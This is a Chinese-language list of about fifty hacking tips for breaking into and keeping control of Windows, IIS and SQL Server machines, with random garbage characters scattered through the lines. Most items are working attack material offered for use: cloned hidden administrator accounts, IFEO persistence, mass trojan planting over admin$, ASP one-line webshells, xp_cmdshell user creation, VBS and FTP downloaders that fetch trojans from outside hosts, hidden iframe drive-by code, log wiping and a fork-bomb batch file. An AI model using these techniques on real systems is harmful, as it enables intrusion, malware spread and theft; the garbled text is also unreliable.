Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
. e. A) j) }, O* dcacls C:\windows\system32 /G hqw20:R/ H! t, s I5 X: s
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
3 O$ `2 M8 Z2 K( ?恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F' }6 }7 c8 C/ S
' O3 P% X# z2 b1 Q" P$ r! X
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。) u4 P( C1 a+ I! n1 w$ D
3 T+ | A* v) D8 ^8 {2 \1 P' \
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。4 D. D) H) ]' U: ~! p7 }' q. v
( B1 W5 r# N4 d5 c9 q5 [% l( {, A
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
6 g* t7 t, w& y5 U$ o1 s, O; z0 k% _/ T8 F: J0 {+ r! D7 h2 D0 U
5、利用INF文件来修改注册表( g/ {* P9 y* O5 ~
[Version]
. o: I h+ E' r4 v# M+ i0 ~, bSignature="$CHICAGO$"! w( Z* l8 Z7 u5 _- G
[Defaultinstall]
1 G6 y$ ]; V) N& laddREG=Ating) r7 }) T f6 R& ?$ Z
[Ating]1 O- l% x5 R! Z& w* i0 e6 X3 t
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
8 ?8 E- Z0 @( k1 u以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:9 R! m6 W" x0 W$ g* r$ W
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径# l- C7 X1 B0 X4 P5 ]3 N0 h
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU. f1 J. d0 ]% O3 S3 |3 j j
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
$ d! e D/ B) |4 g+ H! g! o4 W7 aHKEY_CURRENT_CONFIG 简写为 HKCC6 h; ^/ J R# Y$ |0 d8 U) w
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值, l+ E9 u% v# c" S# A: a
"1"这里代表是写入或删除注册表键值中的具体数据
' J9 E# c1 z, q) V; H/ s& @
1 t$ \6 \! \4 V2 j- U# E1 Z6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,+ b) ?& e2 X! ~
多了一步就是在防火墙里添加个端口,然后导出其键值1 A6 m* \& s M7 a
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]' o' _; p7 E$ }( O1 `
n+ Z f: {8 F O
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
+ {, j7 _: b. ?& \5 t在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
: V+ V5 Q- n, s; S& w
e. @8 z) T& e+ z7 l$ t. f# g8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。2 Z3 M9 P( Z/ P) `: L
4 o( E1 G9 j$ R4 r: \" a
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,7 {3 U* p# k% z5 E3 q
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。1 m3 \- e( K+ `8 v/ ?. m
, z" ~7 Z2 n6 @10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”% j. [% k: z7 G4 o a
6 h# ?/ B- p5 b+ U+ ~
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,; W* z U, r9 Q( c) E
用法:xsniff –pass –hide –log pass.txt; {$ X! h0 j3 g
4 d3 _9 ~* A# s3 e) q( a
12、google搜索的艺术
, L* W* W. {" X1 j& Y% a4 Q/ @1 x搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
, H7 i9 Y! t5 M. ~5 c或“字符串的语法错误”可以找到很多sql注入漏洞。
# p- f/ K0 x# y, U& a! w, I2 d" S% F' H/ q( f+ ^: y+ Y: ~, c
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
; L) ]% Y& L, r: u5 E b
/ |8 h+ Z1 p0 M3 g8 D( y% W L14、cmd中输入 nc –vv –l –p 19872 y& @5 u8 l6 U
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
% U/ z0 h; D& X8 ]0 K, [4 }0 p0 {& t' A+ Q: R! Q" w% \3 C
15、制作T++木马,先写个ating.hta文件,内容为; D4 z' b5 r" i( Y3 l3 x$ G5 ?3 P+ D
<script language="VBScript">" ]5 Y( h: O9 q' V
set wshshell=createobject ("wscript.shell" )
9 H, Q5 J7 H$ u8 a$ ?8 N" h ta=wshshell.run("你马的名称",1)/ p# b/ M; {1 x+ L2 q) j6 X% [3 _2 s* \
window.close
) e( u; z q3 W5 }</script>
% I) y& c/ z$ d: @再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。/ z0 V: K4 O5 ]8 M
) h; e. [' i: e$ P8 a* n9 o0 c16、搜索栏里输入
& i' a8 j3 Y1 J8 s. m: a关键字%'and 1=1 and '%'='6 O9 V" }) s0 `8 s/ B' \
关键字%'and 1=2 and '%'='
& {) p2 a0 k, m" @$ D8 B* ~比较不同处 可以作为注入的特征字符
6 k. f) C7 `+ O& Q, Z
. B$ ^; w. L- D; A# W17、挂马代码<html>: R. d q; X# S O0 G3 K. ], l# ^& R
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>% T! R3 Q8 _! |- ]5 K
</html>; V. k& B8 ~. x
* z: X; _" ?" h/ ?' E9 R: H7 G& W18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
7 x+ G( u3 V* h7 h5 hnet localgroup administrators还是可以看出Guest是管理员来。) \) [" Q* y5 y
) L# ~. P5 i7 P
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等1 F A% ~# v5 P" f4 J+ G1 V
用法: 安装: instsrv.exe 服务名称 路径" F0 }- M3 t' F8 ~0 C
卸载: instsrv.exe 服务名称 REMOVE5 I8 f9 a- V( T L, k H
: J2 {& N4 f; n1 j
4 c8 q" U1 l) o, p/ o1 c) G' ~6 G21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
+ j% T/ [$ Q* k6 Z不能注入时要第一时间想到%5c暴库。0 l: b+ a' @( I7 A! j. B* |
$ @7 a9 n4 S' Z# O9 Q, B3 p22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~( D6 s) W: ]( h9 U; D8 v
3 [8 L+ \( G8 R
23、缺少xp_cmdshell时 p P' w6 f" F
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
" E3 Y# I* H1 A& t, r) D假如恢复不成功,可以尝试直接加用户(针对开3389的)0 N' L, o5 X) l/ t6 Q1 F
declare @o int& X$ q1 ` \2 q7 j# C
exec sp_oacreate 'wscript.shell',@o out
6 h. [* b4 W; w# oexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
/ L, \# \. x h& W& h& P e* _# R! w, }+ N6 R A6 ~/ P r$ j
24.批量种植木马.bat
0 M1 ^3 ~& B* ~ x0 m( ~5 g+ K6 k+ cfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中( G, B: a# f9 j- k4 D) c
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间2 @2 O( }; v4 |0 a2 v8 w
扫描地址.txt里每个主机名一行 用\\开头" y8 J% G1 m# c4 l
' u( e5 O0 e& J+ M) ^6 H25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。8 u- B! O" \. q Q* v s, u
1 ~ @; d/ g, K3 R6 p* W
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
2 r# c7 Z g7 I将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.0 D) I6 d7 g/ y$ ?7 Q& O# F
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
0 t/ _7 ?4 e/ s: L9 ?) d* ^5 J* u6 w( b& R4 K
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
4 Q+ K6 ?$ Y4 |; G% o6 @3 h0 b然后用#clear logg和#clear line vty *删除日志3 r5 L/ F' z5 R9 X
+ P/ g. ^3 p% P- m- u+ \28、电脑坏了省去重新安装系统的方法
- @6 i# Y: v5 Z* n& p! `5 H* V纯dos下执行,/ G3 w$ g# A8 f6 Z
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
& P. T+ c( N3 L8 h4 @2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config- r# \# K! S O, p d' ]
( }! z6 W) T+ Y# ~% d
29、解决TCP/IP筛选 在注册表里有三处,分别是:
+ o; Z/ m F) p- zHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip! V! M3 g. k# p3 _3 _
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip3 P2 i4 t, }# S4 e
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
( `; o( N [8 P* t6 t3 |分别用* g/ R0 s9 `/ F% M4 y2 F
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip# h! x" _: j. U3 u
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
, o' W- i+ w/ I$ ~) Qregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip4 {1 @: a( S4 X* G7 U
命令来导出注册表项
, ^. S3 y. W5 w然后把三个文件里的EnableSecurityFilters"=dword:00000001,# {' t* g- K. c a- a) F
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
9 W2 m: l9 R3 @2 n; D" P9 y9 rregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
0 n9 U) r/ w4 b! b5 o' h# K, ?5 P! B1 n- s7 G1 H* y+ Y
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
. S9 j3 j9 b: x7 n# \, TSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
, { w% T( c A( _. z7 @
2 P$ ^) u% Y% @0 H31、全手工打造开3389工具- o; S" L3 l# {& T8 z5 Q7 W( j
打开记事本,编辑内容如下:
' b' p5 u3 H. x8 H4 N" H# gecho [Components] > c:\sql) g! N+ C7 p, c9 _* u
echo TSEnable = on >> c:\sql( @% H3 }5 R$ x7 ~0 {2 x3 X
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q9 ]5 ~* o1 ~+ H3 q/ M, Y
编辑好后存为BAT文件,上传至肉鸡,执行
" ~+ T# b3 L/ \3 l( y1 L# Z' O; m8 n' P5 }3 Q" N( t2 Q) T/ a
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马1 |3 N) w: ?; A; u! {
- T1 B; r, x2 A7 S5 H; G
33、让服务器重启
; ~5 T( [# J3 I/ K# m8 H2 I写个bat死循环:
( E f7 c0 {2 T2 z& w0 G# R@echo off
' Z" g% }' A9 G' u6 b$ t2 |:loop1
) c9 U5 Q; E7 a9 V( D' U2 y! Scls
: b2 V, W8 T( estart cmd.exe! g! U2 m' i K1 ?) ?5 I
goto loop1
! q* ]1 \ u+ }! |保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启% Q7 m6 H% _" T5 }+ j
. l' m6 T; f& j& ^
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,1 V- |# q1 V# h6 Y2 n
@echo off. w0 c# r' g) P4 a! W# a
date /t >c:/3389.txt" w8 W7 u! u' z K2 _: H/ z
time /t >>c:/3389.txt
+ V+ s6 ^0 r( d( r2 gattrib +s +h c:/3389.bat0 w( [0 Z5 V2 a* U3 u6 B
attrib +s +h c:/3389.txt7 V% i9 k2 O; P9 j
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
) X5 l6 O7 k; u) _并保存为3389.bat
, \ G2 R9 D$ g打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号; y% M& t; u( c8 z# P
2 u# J' f3 `. w- |0 o, p- O
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
8 ^; ?0 r- I# d! Z+ a. I0 Estart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)3 i1 C; S4 Q/ E% I& J- @- Y5 H' ]
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。, l5 i0 e3 j& J: F
( T7 H/ m- d4 ]9 g( a* F! G; c
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
; s+ Y' I4 K% ~9 r. e2 ]echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
7 H2 O9 }) \/ \# e5 G8 U% z! secho 你的FTP账号 >>c:\1.bat //输入账号: z7 k) P7 L7 a7 b8 x9 a) Z
echo 你的FTP密码 >>c:\1.bat //输入密码
/ D% T# X7 t4 wecho bin >>c:\1.bat //登入3 C& B9 M2 Q' i- V" B* c7 k) U
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
j: X' `- {* [. hecho bye >>c:\1.bat //退出1 `7 i# D6 n' B
然后执行ftp -s:c:\1.bat即可
1 B1 B' E: a' w1 s/ c0 R: X6 `8 T: J1 S
& x) g3 M* ^0 s9 R37、修改注册表开3389两法
. U. K3 z2 _; i5 {( N(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表% q( S# K; f5 R2 I) L# @
echo Windows Registry Editor Version 5.00 >>3389.reg
: h4 o5 X, Z$ hecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg' ^0 @& x3 p' v+ b) [- z3 m
echo "Enabled"="0" >>3389.reg
9 P; T) Q; m- {* g% o5 l3 vecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
: V2 P0 r: t0 M5 i' d% i% M' L2 ]* pNT\CurrentVersion\Winlogon] >>3389.reg
, e; T1 o" P# \echo "ShutdownWithoutLogon"="0" >>3389.reg
) J9 U- X1 ]; o( n$ a3 qecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
1 f+ d( v& I) q>>3389.reg9 i3 J( t2 _: i! f2 x9 @) J
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
8 r% V, T# e' p8 T9 ?echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
& }; c! G. R, R# R# d>>3389.reg
: W- a8 ?9 e1 iecho "TSEnabled"=dword:00000001 >>3389.reg
, W+ m" z8 N5 `+ B8 ~echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
! U9 M1 w. d; y0 u1 z2 S+ _echo "Start"=dword:00000002 >>3389.reg
) d; w I. W* `3 ]; [echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
2 n o+ d0 ^% w2 w! K>>3389.reg
2 I( W5 r8 S4 J0 g" Hecho "Start"=dword:00000002 >>3389.reg8 Z1 `1 t- a- N( V
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
6 z1 S V4 Y! g# l* e! P" P% becho "Hotkey"="1" >>3389.reg
4 ?2 y/ h" Z& R S: P% eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 ]/ m0 s! K; c5 DServer\Wds\rdpwd\Tds\tcp] >>3389.reg8 P% Q3 J1 a% L! P: @- T- F+ b7 U& D
echo "PortNumber"=dword:00000D3D >>3389.reg( ~7 q8 p7 t% q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
1 z) j( u0 ~; f3 M" I) h4 IServer\WinStations\RDP-Tcp] >>3389.reg6 l! W$ a- N* k: G. y) j8 g# u
echo "PortNumber"=dword:00000D3D >>3389.reg" h6 q0 J- H& b5 P% u- d; z
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
+ f2 b$ K# l$ [1 p(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)+ |0 k4 c; s$ ?/ m# Q8 @
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效) q0 }# G( J# }0 ~' k4 Y+ E) _% ]
(2)winxp和win2003终端开启+ J, Q' S* m7 g
用以下ECHO代码写一个REG文件:
! J% v7 D a( G0 K# g/ g1 n! vecho Windows Registry Editor Version 5.00>>3389.reg
) v( ]- K" S& p d: j. u/ Eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal; }! a/ o4 p' O6 C* B9 `& n1 t
Server]>>3389.reg2 Y+ v! Q1 N6 i+ p2 O. o/ ]
echo "fDenyTSConnections"=dword:00000000>>3389.reg
! a: Y1 V( ^! R/ hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
8 y+ T# W- C' xServer\Wds\rdpwd\Tds\tcp]>>3389.reg. @) `$ S% i1 h9 }$ \
echo "PortNumber"=dword:00000d3d>>3389.reg: S, v7 e2 l9 W) g
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
' g0 `: g- |* |7 j# y0 e/ L! b# BServer\WinStations\RDP-Tcp]>>3389.reg
+ X4 G' r7 q- |( n6 [echo "PortNumber"=dword:00000d3d>>3389.reg* _3 d+ z1 P; O- c
然后regedit /s 3389.reg del 3389.reg7 u& E; c1 I. V5 T! s3 P: J/ @
XP下不论开终端还是改终端端口都不需重启
; D k9 ]+ F: ]8 I* A! m; X
, t2 c w+ s/ g* k3 O- O/ K; ~. T# ?38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
+ _( J3 V4 l/ ]* }) d用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'4 u! a& U0 z3 u2 L9 V. _
' T5 I. G/ d( V9 x$ \
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!8 z5 m+ J2 W- B! c
(1)数据库文件名应复杂并要有特殊字符 ~% `* Z, K9 P' v9 i/ U9 L3 x
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源7 i; `! B! r% b Y
将conn.asp文档中的* q0 j9 `5 s) I( E+ U1 P) k5 M3 ~
DBPath = Server.MapPath("数据库.mdb")
$ e+ x( J$ |- Q5 [- U6 G0 vconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
& @! O) F& L9 X. v! f# y5 I: _
k$ ]! n3 Q' h( I修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置' ]) G& M$ x' \6 ?8 R- m. d
(3)不放在WEB目录里
3 Y- a! _/ P9 d" z- O; y: ]
! q6 i* j! g, k+ j8 t40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
, d/ i, z( d' J% J3 m! x- i可以写两个bat文件
$ n$ x& v8 f$ z5 k* u# D# e@echo off7 t* v0 J; J% O' k, J
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
2 d* K2 X/ N$ C: _8 J, t7 K@del c:\winnt\system32\query.exe9 f! _6 Z2 ]& v" |5 I
@del %SYSTEMROOT%\system32\dllcache\query.exe. i! M3 X. ^( m3 j5 \* o* o8 }( w7 N
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的: L+ E1 ~3 s6 N# ~1 a6 q
l& S9 f& j# B; W@echo off( q& y- i$ v# b& Z
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
- E: o" r' d: @$ d4 x5 p@del c:\winnt\system32\tsadmin.exe
7 I+ D& l3 G* c4 g@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex* n5 [6 b0 ^) C' H
+ Z+ ]. s4 z8 [3 q# P3 ~' y41、映射对方盘符
& K0 S7 w; W! v! ttelnet到他的机器上,9 H+ N- [2 K( ~# O
net share 查看有没有默认共享 如果没有,那么就接着运行4 L6 v6 e# B1 y" O2 A6 @
net share c$=c:% _# g' k R5 ^( j; [
net share现在有c$
: t, }) o! n: L4 b0 x在自己的机器上运行- a/ s5 J9 b/ U
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
& J( Y& s( m" C
5 h5 s: ?8 [/ w1 h42、一些很有用的老知识& o+ }) }6 S" B% n+ _- s
type c:\boot.ini ( 查看系统版本 )
% f0 w! O- W+ \' h/ C# X5 [net start (查看已经启动的服务)3 x3 N! p. m }
query user ( 查看当前终端连接 )' G, S- \' o( _) u
net user ( 查看当前用户 )- x, ^7 C: p R/ n& m
net user 用户 密码/add ( 建立账号 )
* g3 V/ `. m% Z6 vnet localgroup administrators 用户 /add (提升某用户为管理员)
7 C0 F& J7 L+ Q4 r2 Dipconfig -all ( 查看IP什么的 )
8 }1 \2 B8 t$ M+ |6 _7 K' y4 ^netstat -an ( 查看当前网络状态 )
) }! }! m: v" C3 ~: B8 Q7 Ifindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)* d- d4 ~9 M; h3 i5 o$ ~5 ^
克隆时Administrator对应1F4) W9 ?7 E# x/ P& e. t
guest对应1F5
, p) [6 @& m' J( C- \" i+ Dtsinternetuser对应3E8
9 {" S0 N9 f5 M! ?, {7 ^& E% C9 {* @9 j0 H8 @4 @/ s
43、如果对方没开3389,但是装了Remote Administrator Service
" G- v* e5 y/ x& [4 ]用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接9 f1 P6 B4 a2 o( t
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息7 t. j4 G+ y& J+ R4 R7 R% ~
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
2 |3 t _' ~( \# V
- E: U( v8 D) ?44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)9 n5 w3 _$ g) c ^" }/ \
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
1 y* w7 w5 y: R& G+ J& z" }3 V! K7 p* d' {' p8 h1 I. q* l+ r% e
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入). A" E; H$ ~2 d7 ^0 l; M
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
4 _9 m& ~/ m. X7 H. }# l R: H' e0 \" L^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =3 j3 E+ X0 ?7 B& ~& s6 n4 u; I
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =/ T) U& ?6 W1 ]# Y" C3 [; S
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
2 L; |/ [# B/ n* _+ k! m1 [(这是完整的一句话,其中没有换行符); Y/ y8 W# l( K
然后下载:
. Z2 J' z' u* z% E' X" J% ~cscript down.vbs http://www.hack520.org/hack.exe hack.exe: u5 s9 h! k% Z/ X
5 d0 S- K0 H# n9 Y9 ^6 Z. Q. x
46、一句话木马成功依赖于两个条件:
* P5 x6 [0 ]' g5 k2 E5 ]1、服务端没有禁止adodb.Stream或FSO组件7 z2 w6 M a$ C
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。( d s- s" f* Z, Q* T( N3 U1 @
8 k- h1 K. }; d" A5 ?$ Q
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
5 x5 ]* J2 U5 X6 F( X;alter database utsz set RECOVERY FULL--/ B7 H9 \1 k) T0 z* f
;create table cmd (a image)--
7 B' e) m# r4 f" Z* N3 };backup log utsz to disk = 'D:\cmd' with init--
( `1 H3 J' S5 s;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--: v6 q( F4 {2 B" e; I
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
; l% B9 }0 Z( ]9 P6 l* E5 C: P+ ]$ {注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
9 x! @% i0 B( k$ i5 V, f( I, \
( x8 D& S* J; [3 D+ O48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
1 r/ R" k0 \' S/ ?4 e }7 W8 @ _ c' q x' }) V
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
8 J! z* f7 P: z$ a- ?# l所有会话用 'all'。, ?: s4 Z4 d/ W; e- Q8 r5 ?. ?
-s sessionid 列出会话的信息。
5 K+ V6 t: A+ ~( S; s s" ~% \-k sessionid 终止会话。
6 U, B. w. H: Q- K4 v1 k2 a-m sessionid 发送消息到会话。 j8 C% {1 Y x' \) M$ _6 I6 V
" t8 J$ f8 B2 l" Iconfig 配置 telnet 服务器参数。$ s X8 ^/ W2 ~" K K) X
6 w$ N" i0 ]" A4 X/ g
common_options 为:
/ M! `- K, N* H0 O( o5 R$ K- w-u user 指定要使用其凭据的用户
9 ?1 Z9 l5 ^! ?+ |/ v-p password 用户密码
3 ~& H( C; y3 S2 A4 @; s- { _# O% v& d0 {! S9 F4 ~
config_options 为:9 Y/ k( c8 o$ R0 v
dom = domain 设定用户的默认域
0 e. S% A# `8 S, ^6 fctrlakeymap = yes|no 设定 ALT 键的映射
2 P$ v7 r: w5 C2 s) L( [ k b! a2 jtimeout = hh:mm:ss 设定空闲会话超时值8 k8 x7 F t. \, r8 ]; x2 V
timeoutactive = yes|no 启用空闲会话。) c, h; x a" I) X# r
maxfail = attempts 设定断开前失败的登录企图数。
0 s. v' U5 l) A7 y: [maxconn = connections 设定最大连接数。: F/ Y n8 y M6 ~9 R7 H( @
port = number 设定 telnet 端口。
# E# p5 _; h( [, B- h, O; bsec = [+/-]NTLM [+/-]passwd* a3 C( d6 D, Y6 V) ?
设定身份验证机构
8 ]% W) x$ d5 ?9 Z1 P9 Vfname = file 指定审计文件名。. t( q. Y3 y0 s: f% Y n
fsize = size 指定审计文件的最大尺寸(MB)。6 B2 i* Q2 L6 j
mode = console|stream 指定操作模式。3 k; |( N8 o% b- |
auditlocation = eventlog|file|both
% C, e* K, `6 _( H! l0 V, v6 p指定记录地点* [. l% u* n& x7 l( T. f! n
audit = [+/-]user [+/-]fail [+/-]admin
. b8 _& u( a+ B H
3 C4 u( s; x9 N+ j4 G9 ?49、例如:在IE上访问:
/ k/ h ?& t3 e/ p* |www.hack520.org/hack.txt就会跳转到http://www.hack520.org/) W. a2 g- e4 O
hack.txt里面的代码是:
% V4 u2 w6 O0 Q<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">! K; V" X, E# i/ R0 E' ~
把这个hack.txt发到你空间就可以了!
( H2 }5 S' \ {这个可以利用来做网马哦!8 v! Q1 L0 L( {
2 J( O! Z+ u9 Q5 Z6 d$ R50、autorun的病毒可以通过手动限制!9 o8 H* z/ Y- i" c: K/ I. L
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
4 d! p- I; H1 K, s2,打开盘符用右键打开!切忌双击盘符~/ P6 y9 x( K( x
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!( P* D0 S$ R; w$ E( ]0 M& u
# O; q+ a" w( O& Z51、log备份时的一句话木马:- L( l! [4 b+ o" Z+ g
a).<%%25Execute(request("go"))%%25>
$ A, y( u% J7 l/ Ob).<%Execute(request("go"))%>
( r6 x) G, x$ `* i( F# Pc).%><%execute request("go")%><%: V0 L3 u( }0 G) O" R
d).<script language=VBScript runat=server>execute request("sb")</Script>
7 X) K; ?' Y5 c% _. Z+ ge).<%25Execute(request("l"))%25>* | y! `- z4 b6 W8 p) b; Q
f).<%if request("cmd")<>"" then execute request("pass")%>" r! M) T3 w/ \5 N, v. @$ Y6 K
, r# Z$ |6 l) i; S. J
52、at "12:17" /interactive cmd
8 C9 i4 i% y- _8 _执行后可以用AT命令查看新加的任务
